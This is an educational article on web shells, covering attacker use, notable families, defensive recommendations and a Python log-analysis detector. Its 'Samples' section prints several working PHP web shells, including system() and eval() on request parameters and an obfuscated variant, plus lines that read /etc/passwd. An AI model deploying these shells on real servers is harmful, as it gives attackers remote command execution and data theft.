Web Shells - The Masquerade and Passive Implants that Escalate Privileges
In cybersecurity, a shell is a program or script that gives its user a command interface to operating system services; in an attacker's hands, it is the means of gaining and keeping unauthorized access to systems and networks. A web shell is a shell that runs on a web server: a script, written in any language the server supports, that an attacker interacts with through a web browser to administer the server remotely and launch further attacks. It is the tool an attacker uses to interact with and maintain access to a system after the initial compromise.

Web shells are difficult to detect because they can be hidden inside seemingly innocuous files. They are frequently the step that turns a Local File Inclusion (LFI) vulnerability into the ability to run commands on the system. From there, depending on the attacker's objectives, further reconnaissance can be done or further exploits deployed to elevate privileges, pivot, and maintain persistence. Threat actors first penetrate a system or network and then install a web shell; from then on it serves as a permanent backdoor into the targeted web application and any connected systems.

Privilege escalation begins from the limited or full interactive shell of a basic user or service account that the attacker obtained at initial access, and works upward from there. Shells are the channel for this work: attackers send and receive shells to and from target machines. Low-hanging fruit is checked first, and only after those options fail are more advanced techniques attempted.
Attackers use web shells to obtain backdoor access to the web server and often move laterally across the network in search of assets and other sensitive data to steal. These web shells range from simple PHP scripts that execute a single shell command to deeper and more sophisticated ones that can dump database tables and even launch widespread distributed denial-of-service (DDoS) attacks.
A shell is a user interface for access to operating system services. A reverse shell is a remote shell where the connection is made from the system that offers the services out to the client that wants to use them; attackers can use web shells instead of reverse shells. Both internet-facing and non-internet-facing servers (such as resource hosting servers) can fall victim to web shell attacks. If a web shell is successfully implanted on a web server, it enables a remote attacker to execute malicious commands and steal data. Search engines such as Shodan index internet-connected devices, including web servers and endpoints, which makes exposed servers easy to find as attack vectors. Once a vulnerability is discovered, attackers launch a web shell attack immediately, before a patch for the exposure is installed. Once the web shell is installed, a backdoor exists by definition, giving cybercriminals direct remote access to the compromised web server at any time.

Web shell traffic looks like legitimate website traffic: a client requests a URL and a response is returned. Further, as most sites now run HTTPS/TLS, this traffic is also encrypted. Finally, HTTP is by far the most used protocol, and any site with a lot of traffic will have many thousands of requests per second that would need to be inspected to detect malicious activity. Taken together, these facts mean that unless a defender is carefully inspecting the URLs requested, the contents of requests and responses, and the presence of malicious files in their web application directories, there is a good chance attacker activity will go unnoticed. Attackers favour web shells for the easy remote access and concealment they provide. The efficiency of backdoor creation with web shells is why web shell attacks are used primarily as persistence mechanisms: the establishment of a long-term malicious presence inside the network.
Beyond LFI, there are many other web shell injection strategies, including the discovery and compromise of exposed admin interfaces, cross-site scripting (XSS), and SQL injection.
Organizations can gain insight into potential web shell activity by analyzing highly available NetFlow data. The network profile of a client interacting with a web server while searching for an attack vector is distinct from that of a client interacting with a web shell that has already been operationalized. Adversaries then have several options, depending on their ultimate motivation: remotely execute arbitrary code or commands, move laterally within the network, or deliver additional malicious payloads.

Some web shells are file-upload shells. These are simple, lightweight, and easily overlooked because they cannot execute attacker commands on their own; they can only upload files, such as full-featured web shells, onto the web server. Because of their simplicity they are difficult to detect and can be dismissed as benign, so attackers often use them for persistence or for the initial stages of exploitation. Attackers are also known to hide web shells in non-executable file formats such as media files. Web servers configured to execute server-side code make detection harder here, because such a server will parse a media file for server-side execution instructions. An attacker can embed a web shell script in a photo and upload it to the web server: loaded and analyzed on a workstation, the photo is harmless, but when a web browser requests the file from the server, the embedded code executes on the server side. Microsoft helps defend networks against web shell attacks by using a combination of durable protections that prevent web shell installation and behavior-based detections that identify related malicious activity.
Microsoft Defender for Endpoint exposes malicious behavior by analyzing script file writes and process executions. Finding a web shell after an attack is easier than catching it before the attack happens. Cybercriminals use web shells for many attack scenarios: exfiltrating and collecting sensitive data and credentials, installing malware that could create a path for further infection, defacing websites, redirecting traffic to advertising material, placing links to third-party resources, and redirecting users to exploit kits that infect their computers. Some web shells also hide from casual discovery: if someone accesses the shell's page without the expected authentication, it waits 10 seconds to emulate a page loading and then displays an HTTP 404 error page. This keeps unauthorized users from easily finding the web shell, makes it less conspicuous, and reduces the chance of the page drawing unwanted attention. Persistent threats that open backdoors to targeted systems can be just as dangerous as cyberattacks that pose more immediate risks. These slow-acting hacks rely on malicious scripts uploaded to a web server that let an attacker administer or control the server remotely.
Notable Examples:
China Chopper is a web shell that allows attackers to retain access to an infected system using a client-side application, which contains all the information required to control the target.
X-Zone web shells are a relatively recent development and are primarily obfuscated with gzip and Base64. This form of web shell offers basic functionality: getting system information, checking ports, reading and writing files, creating folders, uploading and downloading, and executing files.
WSO is a PHP web shell, generally obfuscated using simple techniques like string replacement, gzip, and Base64. It blocks crawlers from search engines such as Google, Yahoo and Bing so that the shell is not discovered or listed in search results. WSO stands for "web shell by Orb".
C99 is an advanced version of WSO that ships with additional features; it can display the server's security measures and includes a self-deletion feature.
B374K is developed in PHP, with general functions for viewing data and executing commands.
Recommendations:
Routinely update and patch all software and operating systems to identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Perform general system hardening, including removing services or protocols where they are unnecessary, and keep track of all systems exposed directly to the internet. Frequently audit and review web server logs for unusual or anomalous activity: web shells are a common way for attackers to gain the ability to run commands on a server, and they avoid detection by hiding in the "noise" of normal web traffic. They are highly customizable and flexible tools that require only modest technical skill. Deploy filesystem anomaly detection. The least privilege principle can keep threat actors from uploading a web shell to a vulnerable application: do not allow web applications to write directly to a web-accessible directory or to modify web-accessible code. Organizations should employ several technologies when implementing intrusion prevention. Used together, IPS and WAF solutions can each monitor the flow of traffic and block known malicious uploads; ideally, each security appliance introduced into the ecosystem is tailored to the specific needs of the organization. Isolating a demilitarized zone (DMZ) subnet is a basic technique that quarantines internet-facing servers, and more advanced network segregation techniques, such as software-defined networking (SDN), can help implement a zero-trust architecture. Certain Endpoint Detection and Response (EDR) and host logging solutions also help protect against web shell attacks: they monitor system calls and process lineage abnormalities and use patterns of malicious behavior to detect web shells.
Automated systems can analyze the content of uploaded files by comparing them with known web shells to find malicious code. A timestamp records the date and time at which an event occurred; all files on the web server are timestamped, which makes it easy to single out files with an odd timestamp. The configuration of web servers and web applications should be strong enough to protect against web shells and other threats: use a secure server configuration, close or block ports and services that are not used, and validate user input to limit local and remote file inclusion vulnerabilities. Check content security policies to specify and control which resources can be loaded into web pages, and which users can access system utilities and directories. Mitigation steps for a compromised appliance may include backing up its configuration, restoring it to factory settings and then upgrading it to the version that was running prior to the factory reset. Changing passwords and access permissions is critical: reset the admin password and application programming interface keys stored on the appliance, the passwords for local users defined on the gateway, and the license server credentials. Check the perimeter firewall and proxy to restrict unnecessary access to services, including access through non-standard ports. Practice good credential hygiene and limit the use of accounts with local or domain admin level privileges. Antivirus and IDS vendors do inspect traffic and files and have signatures that match commonly encountered web shells.
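As an added example (not from the original article), the following Python script applies the "audit and review web server logs" advice above. It assumes a combined-format access log, a hypothetical baseline of the application's own PHP entry points, and constructed log lines; it flags requests to PHP files outside that baseline, POSTs to them, and the cmd/q parameter names that the sample shells later on this page read.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined-format access log line (parser constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Hypothetical baseline: the PHP entry points this application is known to ship.
KNOWN_SCRIPTS = {"/index.php", "/login.php", "/search.php"}
# Query parameter names used by the sample shells on this page.
SHELL_PARAMS = {"cmd", "q"}

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not a request line in the expected format
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"], rec["params"] = parts.path, parse_qs(parts.query)
    return rec

def suspicious_reasons(rec):
    """Why one request looks like web shell traffic; an empty list means it does not."""
    if not rec["path"].endswith(".php") or rec["path"] in KNOWN_SCRIPTS:
        return []
    reasons = ["PHP script outside the known application baseline"]
    if rec["method"] == "POST":
        reasons.append("POST to an unknown script")
    for name in sorted(n for n in rec["params"] if n in SHELL_PARAMS):
        reasons.append(f"command-style parameter {name!r}={rec['params'][name][0]!r}")
    return reasons

def analyze(log_text):
    """Return (ip, method, target, reasons) for every flagged request, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and (reasons := suspicious_reasons(rec)):
            hits.append((rec["ip"], rec["method"], rec["target"], reasons))
    return hits

# Constructed sample log (documentation IP ranges; not a real server's traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /search.php?q=printer HTTP/1.1" 200 812
198.51.100.7 - - [10/Oct/2023:14:02:11 +0000] "GET /uploads/avatar.php?cmd=ls HTTP/1.1" 200 71
198.51.100.7 - - [10/Oct/2023:14:02:19 +0000] "POST /uploads/avatar.php HTTP/1.1" 200 1204
198.51.100.7 - - [10/Oct/2023:14:03:02 +0000] "GET /uploads/avatar.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 2391
"""
```

Running `analyze(SAMPLE_LOG)` flags only the three requests from 198.51.100.7; the legitimate `search.php?q=printer` request is left alone because that script is in the baseline.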
Samples of Web Shell Scripts

<!DOCTYPE html>
<html>
<head>
<title>example webshell</title>
</head>
<body>
<?php
    system($_GET['cmd']);
?>
</body>
</html>

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>

<?php
// Adversary sends POST with variable '1' = 'system' and '2' = 'cat /etc/passwd'
$_ = $_POST['1'];
$__ = $_POST['2'];
// The following is now equivalent to running -> system('cat /etc/passwd');
$_($__);
?>

This script reads a user-provided value and passes it to the underlying operating system as a shell command:

<?php
    echo(system($_GET["q"]));
?>

<?php
    eval($_GET["q"]);
?>
Some of the "suspicious" web shells that are more popular with attackers are the following: C99, R57, C100, PHPjackal, Locus.
Conclusion:
Web shells are a common way for attackers to gain the ability to run commands on a server and avoid detection by hiding in the "noise" of normal web traffic. They are highly customizable and flexible tools that require only modest technical skill. For a targeted organization, they can be devastating, leading to data exfiltration, installation of malware, and further reconnaissance of the environment by attackers. A web shell can maintain a persistent connection to the web server over a long period, and the compromised server can be used as a command-and-control server for a botnet or against other vulnerable networks. A botnet is a network of hacked systems generally used for DDoS (distributed denial of service) attacks; here the system's data is not stolen, but the device is used as a resource to perform an attack. The hidden danger of web shells is their stealth and versatility, which makes them a challenging threat to uncover and neutralize. It is essential to follow strict preventive measures to protect the web server from persistent cyber threats, which can penetrate deep into the server if they go unnoticed.